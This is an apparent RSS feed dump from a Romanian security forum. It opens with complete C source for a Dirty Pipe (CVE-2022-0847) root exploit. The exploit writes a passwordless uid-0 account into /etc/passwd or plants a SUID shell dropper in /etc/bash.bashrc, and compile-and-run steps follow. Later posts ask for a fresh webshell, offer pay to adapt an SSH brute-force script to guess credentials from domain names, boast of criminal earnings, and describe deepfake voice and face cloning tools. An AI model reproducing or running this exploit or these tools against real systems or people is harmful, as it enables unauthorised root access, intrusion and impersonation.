 *
 * Proof-of-concept exploit for the Dirty Pipe
 * vulnerability (CVE-2022-0847) caused by an uninitialized
 * "pipe_buffer.flags" variable.  It demonstrates how to overwrite any
 * file contents in the page cache, even if the file is not permitted
 * to be written, immutable or on a read-only mount.
 *
 * This exploit requires Linux 5.8 or later; the code path was made
 * reachable by commit f6dd975583bd ("pipe: merge
 * anon_pipe_buf*_ops").  The commit did not introduce the bug, it was
 * there before, it just provided an easy way to exploit it.
 *
 * There are two major limitations of this exploit: the offset cannot
 * be on a page boundary (it needs to write one byte before the offset
 * to add a reference to this page to the pipe), and the write cannot
 * cross a page boundary.
 *
 * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'
 *
 * Further explanation: https://dirtypipe.cm4all.com/
*/
#define _GNU_SOURCE
#include &lt;unistd.h&gt;
#include &lt;fcntl.h&gt;
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;
#include &lt;sys/utsname.h&gt;
#include &lt;ctype.h&gt;

int validate_kernv() {
    struct utsname buffer;
    int major, minor, patch;
    int is_vulnerable = 0;
    char *version_str;
    int len, compile_year;

    if (uname(&amp;buffer) != 0) {
        perror("uname");
        return 1;
    }
    version_str = buffer.version;
    len = strlen(version_str);
    compile_year = 0;
    for (int i = len - 4; i &gt;= 0; i--) {
        if (isdigit(version_str[i]) &amp;&amp; isdigit(version_str[i+1]) &amp;&amp; 
            isdigit(version_str[i+2]) &amp;&amp; isdigit(version_str[i+3])) {
            compile_year = atoi(&amp;version_str[i]);
            break;
        }
    }
    if (compile_year &lt; 2023) {
        is_vulnerable = 1;
    }
    int fields = sscanf(buffer.release, "%d.%d.%d", &amp;major, &amp;minor, &amp;patch);
    if (fields &lt; 3) patch = 0;
    if (major == 5) {
        if (minor &gt;= 8 &amp;&amp; minor &lt;= 14) {
            is_vulnerable = 1;
        }
        else if (minor == 15 &amp;&amp; patch &lt; 25) {
            is_vulnerable = 1;
        }
    }
    else {
        printf("[-] kernel is not vulnerable !!! quitting ...");
        exit(-1);
    }
    
    if (is_vulnerable) {
     printf("[*] kernel is vulnerable\n");
    }
    else {
     printf("[-] kernel is not vulnerable !!! quitting ...");
        exit(-1);
    }

    return 0;
}

void prepare_pipe(int p[2]) {
    pipe(p);
    int capacity = fcntl(p[1], 1032);
    static char dummy[4096];
    for (int r = capacity; r &gt; 0; ) {
        int n = r &gt; sizeof(dummy) ? sizeof(dummy) : r;
        write(p[1], dummy, n);
        r -= n;
    }
    for (int r = capacity; r &gt; 0; ) {
        int n = r &gt; sizeof(dummy) ? sizeof(dummy) : r;
        read(p[0], dummy, n);
        r -= n;
    }
}

int inject_payload(char *target, char *payload) {
    int fd = open(target, O_RDONLY);
    int p[2];
    __off64_t offset = 1; 

    prepare_pipe(p);
    fd = open(target, O_RDONLY);
    if (fd &lt; 0) return 1;
    if (splice(fd, &amp;offset, p[1], NULL, 1, 0) &lt; 0) {
        perror("[-] splice failed");
        return 0;
    }
    printf("[*] injecting payload to %s\n", target);
    write(p[1], payload, strlen(payload));

    return 1;
}

void bashrc() {
    char *target = "/etc/bash.bashrc";
    char *payload = "\ncp /bin/bash /tmp/x; chmod +s /tmp/x\n#";
    if (inject_payload(target, payload) == 0) {
        printf("[-] failed to inject payload !");
    }
    else {
     printf("[*] payload injected to %s\n", target);
     printf("[*] you need to wait for root to login\n");
     printf("[*] once the root logged in you will get suid shell on /tmp/x\n");
     printf("[*] get root by : /tmp/x -p\n");
    }
}

int toor_check() {
    FILE *fp;
    char path[1035];

    fp = popen("su toor -c id", "r");
    if (fp == NULL) {
        return 0;
    }
    if (fgets(path, sizeof(path), fp) != NULL) {
        if (strstr(path, "root")) {
            return 1;
        } 
    }
    pclose(fp);

    return 0;
}

int passwd() {
    char *target = "/etc/passwd";
    char *payload = "\ntoor::0:0:root:/root:/bin/bash\n#";
    
    system("cp /etc/passwd /tmp/passwd.bak");
    if (inject_payload(target, payload) == 0) {
        printf("[-] failed to inject payload !");
    }
 if (toor_check() == 1) {
        printf("[+] exploitation success, getting root for you.\n");
        system("su toor");
    }
    else {
        printf("[-] failed on method 1, testing method 2\n");  
        return 0;      
    }

    return 1;
}

int main() {
    validate_kernv();
    if (passwd() == 0) {
        bashrc(); 
    }

    return 0;
}


	Note: The complete exploit code contains functions for kernel version validation, pipe preparation, payload injection, and two different exploitation methods targeting /etc/passwd and /etc/bash.bashrc.
 


	Exploitation Methods



	The exploit above uses 2 different payloads with the goal that if the first payload fails, it will be chained by the second payload.
 


	Payload 1: Writes to /etc/passwd to add a new user named ‘toor’ with uid 0. If this payload succeeds, we can immediately get root shell.
 


	Payload 2: Aims to drop a SUID bash shell at /tmp/x. Specifically for the second payload, it must wait for the root user on the system to login because the payload to drop the SUID shell is injected into /etc/bash.bashrc. In Linux, commands contained in /etc/bash.bashrc are executed by every user who logs into the system at login time.
 


 


	Testing the Exploit



	In this example, I used Linux kernel 5.13 running on Lubuntu 20.04.5 in VirtualBox as a guest OS and the host OS is Kali Linux 2025.4.
 


	On the Lubuntu 20.04.5 machine, compile the exploit:
 


	gcc -o dirtypipe2 dirtypipe2.c
 


	Run the exploit:
 


	./dirtypipe2
 


	and finally, we got root shell :



	
		 
	



	
 


	References



	Original disclosure: https://dirtypipe.cm4all.com/
 


	CVE-2022-0847: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0847
 


	Linux Kernel patch: commit 9d2231c5d74e13b2a0546fee6737ee4446017903
 


	Exploit code: https://github.com/bluedragonsecurity]]></description><pubDate>Thu, 19 Feb 2026 07:14:59 +0000</pubDate></item><item><title>Hello from Indonesia</title><link><![CDATA[https://rstforums.com/forum/topic/124040-hello-from-indonesia/?do=findComment&comment=701706]]></link><description>Hello buddy ! 
 


	I am from Indonesia, 
 


	I am a Chinese born in Indonesia.
 


	 
 


	I just noticed this forum after doing a Google search for a Linux kernel rootkit that I created in 2014. 
 


	 
 


	Here's the topic : 
 



	 
 


	I think this forum is cool and it will be nice to register here. In the past, I had some friends from Europe:

	some Albanian hacker friends, such as x-hack, danzel

	a Greek friend: getch
 


	 
 


	Is Romania near Albania and Greece?</description><pubDate>Thu, 19 Feb 2026 07:11:55 +0000</pubDate></item><item><title>Client OPNsense (pFsense)</title><link><![CDATA[https://rstforums.com/forum/topic/124039-client-opnsense-pfsense/?do=findComment&comment=701683]]></link><description>Good evening 

	For some time I have been trying to replace a "top-tier" commercial router with a mini PC on which I installed OPNsense (and pfSense before that).

	I want this mini PC, turned into a router, to become a client of several VPN servers.

	The certificates are issued by consumer routers and do not have the required format (X.509). What solutions would I have? A tutorial? 

	P.S. I am a novice 

	Thank you</description><pubDate>Sun, 15 Feb 2026 17:49:12 +0000</pubDate></item><item><title>How's the hacking going at the office, bosses?</title><link><![CDATA[https://rstforums.com/forum/topic/124030-cum-merge-bosilor-hackereala-pe-la-birou/?do=findComment&comment=701565]]></link><description>Bosses, how's the hacking going at the corporate office?? I haven't logged in since last year. For me it's going great... In January business boomed, over 1.5 million coco in income. The Chinese at Huione got to 10-20 billion coco stolen last year... so I'm a small fish next to those Chinese...
 


	 
 


	How's the hacking going at your office?? Are you finding those bugs so you can pay your installments and buy Bucegi pâté? Do they still sponsor you to go to 2-3 conferences a year so you can fall asleep in the hall???</description><pubDate>Tue, 03 Feb 2026 23:25:46 +0000</pubDate></item><item><title>Webshell needed</title><link><![CDATA[https://rstforums.com/forum/topic/124028-webshell-needed/?do=findComment&comment=701563]]></link><description>Hi,

	I need a more recent webshell, does anyone have one? I want to run some tests against an EDR.

	Thanks</description><pubDate>Mon, 02 Feb 2026 08:53:19 +0000</pubDate></item><item><title>1000 lei</title><link><![CDATA[https://rstforums.com/forum/topic/124014-1000-lei/?do=findComment&comment=701524]]></link><description>Greetings! As the title says, I am looking for a way to make this amount in 2 days. Because of some personal problems (a death, a job change plus rent) I have reached the point where I am effectively at zero financially, plus loans until I manage to get my first salary here. But as the saying goes, the rent has to be paid, and the landlord here already gave me an extension last month when I had that tragic event in the family. I am one of the old users around here, from back when matza moarta neagra was trading insults with kw3, pax was giving us XSSes to steal cookies from yahoo, ahead was losing his car and virusica was on garena, to reminisce a bit, but I am not posting from my own account, I think out of shame. I did not come here to ask for something for free, but I would ask that if you need someone to help you with various paid tasks that involve a computer, you contact me, and if I can do it I will gladly help. Thank you, respectfully.</description><pubDate>Tue, 13 Jan 2026 20:25:24 +0000</pubDate></item><item><title>SVG Filters Clickjacking 2.0: What to Watch for and How to Defend Your Site</title><link><![CDATA[https://rstforums.com/forum/topic/124006-svg-filters-clickjacking-20-what-to-watch-for-and-how-to-defend-your-site/?do=findComment&comment=701512]]></link><description>RST just shared an interesting write-up on &#x201C;SVG Filters &#x2013; Clickjacking 2.0,&#x201D; posted in the Exploituri section (Dec 7, 2025). RST Forums The big idea is simple: attackers keep finding new ways to hide or reshape what users &#x201C;think&#x201D; they are clicking, so the user ends up approving the wrong action. This matters most for high-risk flows like payment approval, account recovery, password changes, crypto transfers, admin panels, and OAuth consent screens. 
Game Hub Emulator If you run a site or app, the best defense is layered: block framing where possible (CSP frame-ancestors is the modern choice, with X-Frame-Options as legacy backup), require re-auth or step-up checks for sensitive actions, add clear confirmation screens that show the exact action and target, and review any SVG rendering or filter usage in UI layers that sit near &#x201C;confirm&#x201D; buttons. Also test your key pages in a &#x201C;hostile embed&#x201D; scenario during security review, because clickjacking is often a UX trap more than a pure code bug. The forum post links the full external article for anyone who wants the deep dive.</description><pubDate>Thu, 08 Jan 2026 09:37:39 +0000</pubDate></item><item><title>[For sale] YubiKey Yubico 5C USB-C Complete hardware security, cryptographic device - SEALED, new and CHEAP</title><link><![CDATA[https://rstforums.com/forum/topic/123988-vand-yubikey-yubico-5c-usb-c-securitate-hardware-completa-dispozitiv-criptografic-sigilat-nou-si-ieftin/?do=findComment&comment=701451]]></link><description><![CDATA[Hello. I am selling this product sealed, new. I bought 2 devices at the time and I currently use only one of them, and the second has remained sealed, unused.

	-> Product description:

	New YubiKey Yubico 5C USB-C. Device with advanced security for authentication. Protects data and access to online accounts. Fast connection via USB-C.

	YubiKey 5C is an authentication solution that offers superior protection against phishing, eliminates account takeovers and meets compliance requirements for strong authentication.

	YubiKey 5C is the top USB-C security key in the YubiKey 5 series, developed by Yubico, a world leader in passwordless authentication solutions. It is a multifactor (MFA) hardware authentication device that offers advanced protection against cyber attacks through a complete set of modern security protocols, including FIDO2, U2F, Smart Card (PIV), OTP, OpenPGP and others.

	With a single compact key, compatible with all devices with a USB-C port, you protect your access to critical accounts and applications, whether you work from the office, from home or on the move.

	What is YubiKey 5C? 
	YubiKey 5C is a physical security key that connects via USB-C and offers extremely secure authentication, with no need for traditional passwords or temporary codes via SMS or apps.

	It is intended for:

	Passwordless authentication 
	Two-step authentication (2FA) 
	Multifactor authentication (MFA) 
	Users who need Smart Card / PIV, OTP, or encrypted digital signatures 
	Who is YubiKey 5C for? 
	Professional users who access sensitive accounts (e-mail, VPN, cloud platforms) 
	Companies that want to improve employee security with FIDO2 hardware authentication 
	IT administrators who want quick integration into Active Directory, Azure AD, Okta, etc. 
	Any user who uses modern devices with a USB-C port (MacBook, Dell, HP, Lenovo laptops etc.) 
	Key benefits and features
 


	🔒 Multi-protocol, for any security need

	YubiKey 5C supports the most important protocols:

	FIDO2 / WebAuthn – for passwordless authentication 
	U2F – for compatibility with popular services (Google, Microsoft) 
	Smart Card (PIV) – for secure access in enterprise networks 
	OpenPGP – for encryption and digital signatures 
	OTP (One-Time Passwords) – for compatibility with classic systems 
	🔌 USB-C – maximum compatibility with modern devices

	It connects natively to laptops, tablets and phones with USB-C, without adapters.

	⚙️ No software, drivers or batteries required

	It can be used immediately after connecting – plug & play. It has no moving parts and requires no charging or network.

	🌐 Broad compatibility with services and applications

	Google Workspace, Microsoft 365, Azure, GitHub, Dropbox 
	Password managers: Bitwarden, 1Password, LastPass 
	IAM systems: Okta, Ping Identity, Duo Security 
	Browsers: Chrome, Edge, Firefox, Safari 
	Operating systems: Windows, macOS, Linux, Android
 


	🛡️ Enterprise-level security

	Does not transmit data over the network 
	The cryptographic secret is stored on a secure chip, isolated from the internet 
	Drastically reduces the risk of phishing and account compromise 
	📈 Scalability and cost efficiency

	Can be deployed quickly in organizations of any size 
	Reduces IT costs by eliminating password resets 
	Can store up to 100 FIDO2 credentials and 64 OTP passwords per application 
	How does YubiKey 5C work? 
	You connect the key to the device's USB-C port 
	You enable authentication on the desired account (Google, Microsoft etc.) 
	You authenticate by simply touching the key 
	For multifactor authentication, the key can be used together with a PIN or another additional factor.

	Why choose YubiKey 5C? 
	✔️ Impenetrable hardware security, no network, no cloud 
	✔️ Absolute versatility, thanks to multi-protocol support 
	✔️ Extended compatibility with applications and IT infrastructures 
	✔️ Native USB-C – no adapters, no compromises 
	✔️ Ideal for companies and professionals, but also for individual users 
	✔️ Ready for immediate use, with no software or installation
 


	Frequently asked questions (FAQ)

	Does YubiKey 5C work on a MacBook? 
	Yes, it is 100% compatible with macOS and native USB-C ports.

	Can I use the same key for multiple accounts? 
	Absolutely. You can store up to 100 accounts with FIDO2 authentication.

	Is an app needed to use it? 
	No. The key works without additional software – plug & play.]]></description><pubDate>Fri, 12 Dec 2025 11:28:16 +0000</pubDate></item><item><title>hello, anyone who knows their way around go?</title><link><![CDATA[https://rstforums.com/forum/topic/123987-salutare-cineva-care-se-descurca-cu-go/?do=findComment&comment=701445]]></link><description>I have a Go script for SSH brute-force that works well: it detects honeypots, nologin accounts and real servers. I would like to modify the script so that it works on domains: the username should no longer be preset, but formed from the first 7 characters of the domain name, and the password should be the domain name without the extension (.net, .com etc.). I am willing to pay between 50 and 150 lei for this modification.</description><pubDate>Mon, 08 Dec 2025 20:28:03 +0000</pubDate></item><item><title><![CDATA[Open Source & Open Weights Ai Tools: Audio / Photo / Video (working on RTX 5090 and lower series)]]></title><link><![CDATA[https://rstforums.com/forum/topic/123986-open-source-open-weights-ai-tools-audio-photo-video-working-on-rtx-5090-and-lower-series/?do=findComment&comment=701442]]></link><description><![CDATA[RVC / Applio - voice cloner / stem extractor / speech to speech (Applio is compatible with RTX 50** series)
 


	
		RVC and Applio are very useful tools for those who want to clone someone's voice and use it in online conversations, or to modify another previously recorded voice.
	
	
		Unlike classic TTS (text-to-speech) models, with these models you can speak LIVE on the phone or on online platforms.
	
	
		You can replace the original voice on a song with your own voice in just a few seconds. 
	
	
		You can successfully use both the female and the male voices you have cloned. The results can come out FLAWLESS.
	
	
		RVC is the original model, but it does not run properly on the new graphics cards. Applio works without problems. I recommend testing Applio directly.
	
	
		The video tutorial for RVC largely applies to Applio as well and can be found here: https://www.youtube.com/watch?v=PYQnzIwa4mA
	

	Wan2GP - photo / video / lip sync models for GPU Poor (also runs on nVidia video cards with 6GB).

	
		Wan2GP integrates several models that can be used successfully to generate quality images, or clips at a more than decent resolution.
	
	
		The "star" models include: Wan 2.1 (uncensored), Wan 2.2 (uncensored), Hunyuan 1.5 (uncensored), Flux 1 (censored), Flux 2 (censored), Qwen Image (uncensored), and the new Z-Image model (uncensored), which generates extremely believable pictures in just a few seconds.
	
	
		Most of these base models come bundled with other models that allow clips and pictures to be created and edited in every possible way.
	
	
		For lip sync you can use the Wan 2.1>Infinitetalk 14B or Wan 2.1>Multitalk 14B models. Infinitetalk has good lip sync, but it has a problem with fingers (in the case where 
	
	
		Many of the models found in Wan2GP allow you to clone the appearance of other people. They can preserve physical characteristics (face, tattoos, earrings), as well as the clothes from the images you use when generating clips. I think you know who has been abusing them heavily in recent years.
	
	
		Also in the Wan2GP package you will find models that let you completely change the appearance of characters in already existing video clips. More precisely, you can take a clip of Ion Iliescu performing certain actions, feed it into a model in Wan2GP and replace him with Nicolae Ceausescu making the same movements, in the same environment. It does not require much work, just letting the computer process until it finishes its task. 
		 
		Everything I posted above uses the Gradio interface, which is much more intuitive than the flows in ComfyUI. 
		You need a video card capable of "handling" these models, from the manufacturer nVidia. As I said, Wan2GP also works on video cards with 6 GB of VRAM. The more VRAM you have, the faster it finishes its jobs. A video card with only 6 GB of VRAM can take a few hours to process a video, whereas a video card with 32 GB of VRAM finishes the same job in a few minutes. 
		The more RAM, the better. All the models above need RAM. Wan2GP has different profiles that let you use it with much less than 128 GB of RAM as well (processing speed will be affected). 
		I posted RVC / Applio and Wan2GP together because you can combine the voices cloned with Applio with the videos generated by the models in Wan2GP. They are very useful for "good" purposes and devastating when used for "evil" purposes. 
	
	
		To install the models as easily as possible (installing them can be a huge headache), I recommend using Applio (part of the Dione application), and in the case of Wan2GP using One-click installation - Redtash1 or Pinokio Computer or even Dione.
	

	If you run into problems when you want to use one of these models, you can leave a message in the comments and I will help you if I know the fix.]]></description><pubDate>Sun, 07 Dec 2025 21:04:08 +0000</pubDate></item><item><title>SVG Filters - Clickjacking 2.0</title><link><![CDATA[https://rstforums.com/forum/topic/123985-svg-filters-clickjacking-20/?do=findComment&comment=701441]]></link><description>A new and interesting clickjacking method. I won't copy/paste the article, because a lot of work went into it and it would be a shame to create duplicate content for it. You can find it in full here https://lyra.horse/blog/2025/12/svg-clickjacking/
 


	 
 


	Other articles from her blog: https://lyra.horse/blog/</description><pubDate>Sun, 07 Dec 2025 20:08:17 +0000</pubDate></item><item><title>[VIDEO] Hacking '&#x1F602;' to Track ANY WhatsApp or Signal User</title><link><![CDATA[https://rstforums.com/forum/topic/123984-video-hacking-%F0%9F%98%82-to-track-any-whatsapp-or-signal-user/?do=findComment&comment=701438]]></link><description/><pubDate>Fri, 05 Dec 2025 10:11:05 +0000</pubDate></item><item><title>Something to watch when bored</title><link><![CDATA[https://rstforums.com/forum/topic/123983-de-vizionat-la-plictiseala/?do=findComment&comment=701433]]></link><description>So there I was, sitting with a beer in my arms, when I stumbled by chance upon something nice to watch if anyone gets bored.

	(24) The Man Who Made Everything on the Internet Free - YouTube

	The Man Who Tried to Unmask Anonymous

	PS: the channel is not mine, I have no affiliation, this is not an ad, simply beer &#x1F37A;, peanuts and memories &#x1F919;

	If you know anything else interesting to watch, leave a reply...

	hashtag 2026, damn, it feels like only the day before yesterday it was the summer of '09 when @Nytro was giving me a warn because I was writing any damn way &#x1F602;</description><pubDate>Tue, 02 Dec 2025 22:15:11 +0000</pubDate></item><item><title>help modifying an SSH brute-force script in goland</title><link><![CDATA[https://rstforums.com/forum/topic/123982-ajutor-in-modificarea-unui-script-bruteforce-ssh-in-goland/?do=findComment&comment=701430]]></link><description>Hello everyone!</description><pubDate>Tue, 02 Dec 2025 18:59:53 +0000</pubDate></item></channel></rss>
